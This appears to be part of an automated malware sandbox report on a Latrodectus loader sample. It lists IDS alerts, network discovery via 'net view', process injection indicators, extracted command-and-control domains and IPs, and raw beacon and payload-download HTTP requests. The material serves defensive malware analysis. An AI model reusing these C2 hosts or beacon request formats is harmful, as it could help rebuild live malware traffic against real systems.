Source: unknown	HTTPS traffic detected: 104.21.68.89:443 -> 192.168.2.5:49972 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.217.190:443 -> 192.168.2.5:50006 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.68.89:443 -> 192.168.2.5:50029 version: TLS 1.2

Source: wait.dll.dll

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF

Source:

Spreading

Performs a network lookup / discovery via net view

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all

Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D72E90 swprintf,swprintf,FindFirstFileW,GetLastError,swprintf,FindNextFileW,CompareFileTime,FindNextFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,swprintf,swprintf,FindClose,	3_2_00007FF8A8D72E90
Source: C:\Windows\explorer.exe	Code function: 8_2_0303A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,	8_2_0303A8E0
Source: C:\Windows\explorer.exe	Code function: 8_2_03032B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	8_2_03032B28
Source: C:\Windows\explorer.exe	Code function: 8_2_030404C0 FindFirstFileW,	8_2_030404C0
Source: C:\Windows\explorer.exe	Code function: 8_2_0838A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,	8_2_0838A8E0
Source: C:\Windows\explorer.exe	Code function: 8_2_083904C0 FindFirstFileW,	8_2_083904C0
Source: C:\Windows\explorer.exe	Code function: 8_2_08382B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	8_2_08382B28
Source: C:\Windows\explorer.exe	Code function: 8_2_0885A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,	8_2_0885A8E0
Source: C:\Windows\explorer.exe	Code function: 8_2_088604C0 FindFirstFileW,	8_2_088604C0
Source: C:\Windows\explorer.exe	Code function: 8_2_08852B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	8_2_08852B28
Source: C:\Windows\explorer.exe	Code function: 8_2_0E456604 lstrcpyA,lstrlenA,lstrcatA,lstrcatA,FindFirstFileA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,StrStrIA,lstrcpyA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	8_2_0E456604
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4516F4 FindFirstFileW,FindNextFileW,LoadLibraryW,	8_2_0E4516F4
Source: C:\Windows\explorer.exe	Code function: 8_2_0E515C40 FindFirstFileW,FindClose,	8_2_0E515C40
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4F50D8 FindFirstFileA,	8_2_0E4F50D8
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4F5088 CloseHandle,GetCurrentProcessId,FindFirstFileA,FindClose,GetFileSize,	8_2_0E4F5088

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49928 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2018052 - Severity 1 - ET MALWARE Zbot Generic URI/Header Struct .bin : 192.168.2.5:49941 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49922 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49972 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50009 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50007 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50000 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49999 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49986 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50001 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50013 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50015 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2018052 - Severity 1 - ET MALWARE Zbot Generic URI/Header Struct .bin : 192.168.2.5:49950 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50002 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49980 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50014 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49962 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50010 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50021 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50003 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50025 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50011 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50019 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50018 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50030 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50032 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50017 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50026 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50036 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50008 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50023 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50033 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50039 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50037 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50006 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49995 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49916 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50035 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50024 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2018052 - Severity 1 - ET MALWARE Zbot Generic URI/Header Struct .bin : 192.168.2.5:49934 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50034 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:49907 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50038 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50020 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50027 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50016 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50004 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50012 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50029 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50031 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.5:50022 -> 172.67.217.190:443

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 104.21.68.89 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.67.217.190 443	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 103.57.249.207 6542	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 94.232.43.224 6542	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://reateberam.com/test/
Source: Malware configuration extractor	URLs: https://dogirafer.com/test/

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.5:49704 -> 103.57.249.207:6542
Source: global traffic	TCP traffic: 192.168.2.5:49713 -> 94.232.43.224:6542

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: SITINETWORS-IN-APSITINETWORKSLIMITEDIN SITINETWORS-IN-APSITINETWORKSLIMITEDIN
Source: Joe Sandbox View	ASN Name: WELLWEBNL WELLWEBNL

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49907 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49922 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49916 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49928 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49934 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49941 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49950 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49962 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49968 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49972 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49980 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49986 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49995 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49999 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50000 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50003 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50004 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50005 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50007 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50010 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50008 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50001 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50006 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50011 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50002 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50009 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50014 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50013 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50016 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50012 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50023 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50020 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50024 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50021 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50026 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50030 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50027 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50035 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50029 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50031 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50022 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50028 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50018 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50017 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50037 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50032 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50015 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50039 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50034 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50033 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50036 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50038 -> 104.21.68.89:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50025 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50019 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49950 -> 172.67.217.190:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49934 -> 172.67.217.190:443

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hmdViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 92Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hndViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hkdViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hldViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.com
Source: global traffic	HTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/stkm.bin HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.com
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hidViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: reateberam.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hjdViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hgdViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hhdViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hudViRxTPtzmAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hvdViRxTPtzGAYfxODCVLcbPy2vCfMYFSg6m741x7W74yYwzVuV08oc+L33B0vDqTu8/JSvpK54Ytrr38FQTZAvp/2bg1TAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgbUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 12232Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /test/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedCookie: aXLYGobmm+hnYwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: dogirafer.comContent-Length: 0Cache-Control: no-cache
